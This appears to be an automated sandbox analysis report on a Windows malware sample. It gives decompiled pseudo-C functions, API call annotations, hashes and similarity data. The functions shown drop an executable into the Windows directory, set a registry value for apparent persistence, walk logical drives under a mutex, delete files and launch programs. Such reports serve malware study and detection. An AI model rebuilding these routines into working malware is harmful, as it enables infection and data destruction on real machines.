                                                            0x00406bbc
                                                            0x00406bc4
                                                            0x00406bcd
                                                            0x00406bdc
                                                            0x00406be4
                                                            0x00406be9
                                                            0x00406beb
                                                            0x00406bec
                                                            0x00406bf3
                                                            0x00406bf6
                                                            0x00406c00
                                                            0x00406c08
                                                            0x00406c10
                                                            0x00406c19
                                                            0x00406c1d
                                                            0x00406c20
                                                            0x00406c23
                                                            0x00406c23
                                                            0x00406bf6
                                                            0x00406c36
                                                            0x00406c3d
                                                            0x00406c47
                                                            0x00406c47
                                                            0x00406c54
                                                            0x00406c58
                                                            0x00406c5a
                                                            0x00406c5b
                                                            0x00406c62
                                                            0x00406c68
                                                            0x00406c6d
                                                            0x00406c70
                                                            0x00406c70
                                                            0x00406c75
                                                            0x00406c78
                                                            0x00406c78
                                                            0x00406c62
                                                            0x00406b74
                                                            0x00406b74
                                                            0x00406b75
                                                            0x00406b7c
                                                            0x00406b7f
                                                            0x00406b8e
                                                            0x00406b92
                                                            0x00406b94
                                                            0x00406bb3
                                                            0x00406bb3
                                                            0x00406bb6
                                                            0x00406bb9
                                                            0x00406bba
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406b96
                                                            0x00406b96
                                                            0x00406b9a
                                                            0x00406b9d
                                                            0x00406bad
                                                            0x00406bb0
                                                            0x00406bb1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bb1
                                                            0x00406b9d
                                                            0x00000000
                                                            0x00406b94
                                                            0x00406b7f
                                                            0x00406c7b
                                                            0x00406c7d
                                                            0x00406c80
                                                            0x00406c83
                                                            0x00406c8b
                                                            0x00406c96

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteIconInfoObject
                                                            • String ID: ,k@
                                                            • API String ID: 2689914137-1053005162
                                                            • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                            • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                            • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                            • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004078A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t39;
				void* _t40;
				void* _t46;
				intOrPtr _t57;
				void* _t61;

				_t60 = __esi;
				_t59 = __edi;
				_t46 = __ecx;
				_t45 = __ebx;
				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
				E00404EEC(_t61 - 0xa240);
				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
				_push(1);
				_push(0);
				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
				E00405008(_t61 - 0xa250, _t45, _t46);
				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
				E004032CC();
				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
				_t40 =  *0x40a650; // 0x400000
				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00407993);
				return E004030B8(_t61 - 0xa25c, 0x14);
			}








                                                            0x004078a6
                                                            0x004078a6
                                                            0x004078a6
                                                            0x004078a6
                                                            0x004078ae
                                                            0x004078bf
                                                            0x004078d0
                                                            0x004078d5
                                                            0x004078d7
                                                            0x004078e1
                                                            0x004078f1
                                                            0x004078f8
                                                            0x00407913
                                                            0x00407926
                                                            0x00407937
                                                            0x0040794d
                                                            0x00407958
                                                            0x00407963
                                                            0x00407969
                                                            0x00407970
                                                            0x00407973
                                                            0x00407976
                                                            0x0040798b

                                                            APIs
                                                              • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                              • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                              • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                            • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                            • String ID: open
                                                            • API String ID: 2622400689-2758837156
                                                            • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                            • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                            • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                            • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004079A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 51%
                                                            			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t31;
				void* _t59;
				intOrPtr _t73;
				void* _t82;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t82 = __edi;
				_t54 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t86);
				_push(0x407ac4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E00407080(0x4091e0, 0xb, 0xb);
				E004031F4( &_v12, 0xb, 0x4091e0);
				_push(_v12);
				E00404F90( &_v16, __ebx, 0xb);
				_pop(_t59);
				E00403258( &_v8, _t59, _v16);
				if(E00404B9C() != 0) {
					DeleteFileA(E0040340C(_v8));
				}
				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
				if(_t31 != 0) {
					E00407080(0x4091ec, 0x1a, 0x1a);
					E004031F4( &_v20, 0x1a, 0x4091ec);
					_t55 = E0040575C(0x80000000, 0x1a, _v20);
					E00407080(0x409208, 8, 8);
					E004031F4( &_v28, 8, 0x409208);
					E00403258( &_v24, _v28, _v8);
					E0040578C(_t40, _v24, 0);
					E004057CC(_t55);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00407ACB);
				return E004030B8( &_v28, 6);
			}















                                                            0x004079a0
                                                            0x004079a0
                                                            0x004079a0
                                                            0x004079a5
                                                            0x004079a6
                                                            0x004079a7
                                                            0x004079a8
                                                            0x004079a9
                                                            0x004079aa
                                                            0x004079ab
                                                            0x004079ae
                                                            0x004079af
                                                            0x004079b4
                                                            0x004079b7
                                                            0x004079c9
                                                            0x004079db
                                                            0x004079e3
                                                            0x004079e7
                                                            0x004079f2
                                                            0x004079f3
                                                            0x00407a02
                                                            0x00407a0d
                                                            0x00407a0d
                                                            0x00407a24
                                                            0x00407a2b
                                                            0x00407a3c
                                                            0x00407a4e
                                                            0x00407a60
                                                            0x00407a71
                                                            0x00407a83
                                                            0x00407a91
                                                            0x00407a9d
                                                            0x00407aa4
                                                            0x00407aa4
                                                            0x00407aab
                                                            0x00407aae
                                                            0x00407ab1
                                                            0x00407ac3

                                                            APIs
                                                              • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                              • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                            • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$AttributesDeleteDirectoryWindows
                                                            • String ID: MZP
                                                            • API String ID: 3550186980-2889622443
                                                            • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                            • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                            • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                            • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404BC4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404BC4(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				DWORD* _t8;

				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
				_t3 = 0;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}






                                                            0x00404bcf
                                                            0x00404bd6
                                                            0x00404bd7
                                                            0x00000000
                                                            0x00404bd9
                                                            0x00404bdc

                                                            APIs
                                                            • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: MZP
                                                            • API String ID: 2738559852-2889622443
                                                            • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                            • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                            • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                            • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404BE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404BE0(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				void* _t7;
				DWORD* _t9;

				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
				_t3 = _t7;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}







                                                            0x00404bea
                                                            0x00404bf1
                                                            0x00404bf2
                                                            0x00000000
                                                            0x00404bf4
                                                            0x00404bf7

                                                            APIs
                                                            • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID: MZP
                                                            • API String ID: 3934441357-2889622443
                                                            • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                            • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                            • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                            • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E74, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                              • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                              • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                              • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                            • String ID:
                                                            • API String ID: 2227675388-0
                                                            • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                            • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                            • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                            • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040759C, Relevance: 3.1, APIs: 2, Instructions: 62synchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* _t11;
				void* _t17;
				void* _t32;
				intOrPtr _t38;
				void* _t44;
				void* _t46;
				intOrPtr _t49;

				_t56 = __fp0;
				_t45 = __esi;
				_t48 = _t49;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t49);
				_push(0x40765c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49; // executed
				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
				if(_t11 != 0) {
					_t40 = 0x14;
					E00407080(0x4091c8, 0x14, 0x14);
					_t17 = E00404018(0, 0, 0x4091c8); // executed
					_t44 = _t17;
					if(GetLastError() != 0xb7) {
						E00406D40( &_v8, __ebx, _t44, __esi); // executed
						_t32 = E0040320C(_v8);
						_t53 = _t32;
						if(_t32 > 0) {
							_t46 = 1;
							do {
								E004031B4();
								_t40 = 0x407674;
								E00403214( &_v12, 0x407674);
								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
								_pop(0x14);
								_t46 = _t46 + 1;
								_t32 = _t32 - 1;
								_t54 = _t32;
							} while (_t32 != 0);
						}
						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
						ReleaseMutex(_t44);
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00407663);
				return E004030B8( &_v12, 2);
			}












                                                            0x0040759c
                                                            0x0040759c
                                                            0x0040759d
                                                            0x0040759f
                                                            0x004075a1
                                                            0x004075a3
                                                            0x004075a4
                                                            0x004075a5
                                                            0x004075a8
                                                            0x004075a9
                                                            0x004075ae
                                                            0x004075b1
                                                            0x004075b4
                                                            0x004075bb
                                                            0x004075cb
                                                            0x004075d0
                                                            0x004075de
                                                            0x004075e3
                                                            0x004075ef
                                                            0x004075f4
                                                            0x00407601
                                                            0x00407603
                                                            0x00407605
                                                            0x00407607
                                                            0x0040760c
                                                            0x00407617
                                                            0x0040761f
                                                            0x00407624
                                                            0x0040762c
                                                            0x00407631
                                                            0x00407632
                                                            0x00407633
                                                            0x00407633
                                                            0x00407633
                                                            0x0040760c
                                                            0x00407636
                                                            0x0040763c
                                                            0x0040763c
                                                            0x004075ef
                                                            0x00407643
                                                            0x00407646
                                                            0x00407649
                                                            0x0040765b

                                                            APIs
                                                              • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                            • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                              • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                            • String ID:
                                                            • API String ID: 676290295-0
                                                            • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                            • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                            • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                            • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004012A0(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401154(0x40a5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                            0x004012a3
                                                            0x004012ad
                                                            0x004012bc
                                                            0x004012af
                                                            0x004012af
                                                            0x004012af
                                                            0x004012c2
                                                            0x004012cf
                                                            0x004012d4
                                                            0x004012d6
                                                            0x004012da
                                                            0x004012e3
                                                            0x004012ea
                                                            0x004012f6
                                                            0x004012fd
                                                            0x00000000
                                                            0x004012fd
                                                            0x004012ea
                                                            0x00401302

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                            • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                            • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                            • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405200, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 45%
                                                            			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t30 = __eax;
				_push(_t46);
				_push(0x405291);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				E00404ED0(__eax,  &_v16);
				_push(_v16);
				E00404EEC( &_v20);
				_pop(_t39); // executed
				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
				_t31 = 1;
				while(_v8 != 0) {
					E00404798( &_v8,  &_v12, E004052A8);
					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
						_t22 = 0;
					} else {
						_t22 = 1;
					}
					_t31 = _t22;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00405298);
				return E004030B8( &_v20, 4);
			}













                                                            0x00405205
                                                            0x00405206
                                                            0x00405207
                                                            0x00405208
                                                            0x0040520a
                                                            0x0040520e
                                                            0x0040520f
                                                            0x00405214
                                                            0x00405217
                                                            0x0040521f
                                                            0x00405227
                                                            0x0040522d
                                                            0x00405238
                                                            0x00405239
                                                            0x0040523e
                                                            0x00405270
                                                            0x0040524d
                                                            0x00405254
                                                            0x00405268
                                                            0x0040526c
                                                            0x0040526c
                                                            0x0040526c
                                                            0x0040526e
                                                            0x0040526e
                                                            0x00405278
                                                            0x0040527b
                                                            0x0040527e
                                                            0x00405290

                                                            APIs
                                                              • Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                              • Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407736,?,?,?,00000000,0040798C), ref: 0040525F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFind$CloseDeleteFirst
                                                            • String ID:
                                                            • API String ID: 3969940835-0
                                                            • Opcode ID: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                            • Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
                                                            • Opcode Fuzzy Hash: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                            • Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040578C, Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040578C(void* __eax, void* __ecx, void* __edx) {
				void* _t4;
				char* _t7;
				long _t10;
				void* _t12;

				_t12 = __eax;
				if(__eax == 0) {
					L2:
					return 0;
				}
				_t4 = E0040320C(__ecx);
				_t7 = E0040340C(__ecx);
				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
				if(_t10 == 0) {
					return 1;
				}
				goto L2;
			}







                                                            0x00405793
                                                            0x00405797
                                                            0x004057c0
                                                            0x00000000
                                                            0x004057c0
                                                            0x0040579b
                                                            0x004057a4
                                                            0x004057b7
                                                            0x004057be
                                                            0x00000000
                                                            0x004057c4
                                                            0x00000000

                                                            APIs
                                                            • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,?,00000000,00407AA2,00000000,00407AC4,?,?,00000000,00000000), ref: 004057B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                            • Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
                                                            • Opcode Fuzzy Hash: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                            • Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406CA8(void* __eax, int __ecx, void* __edx) {
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t11;
				int _t16;

				_t16 = __ecx;
				_t11 = __eax;
				E004064E4(__eax);
				_t6 = E0040340C(__edx);
				_t7 =  *0x40a650; // 0x400000
				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
				if(_t8 > 1) {
					return E00406520(_t11, _t8);
				}
				return _t8;
			}








                                                            0x00406cab
                                                            0x00406caf
                                                            0x00406cb3
                                                            0x00406cbb
                                                            0x00406cc1
                                                            0x00406cc7
                                                            0x00406ccf
                                                            0x00000000
                                                            0x00406cd4
                                                            0x00406cdc

                                                            APIs
                                                              • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
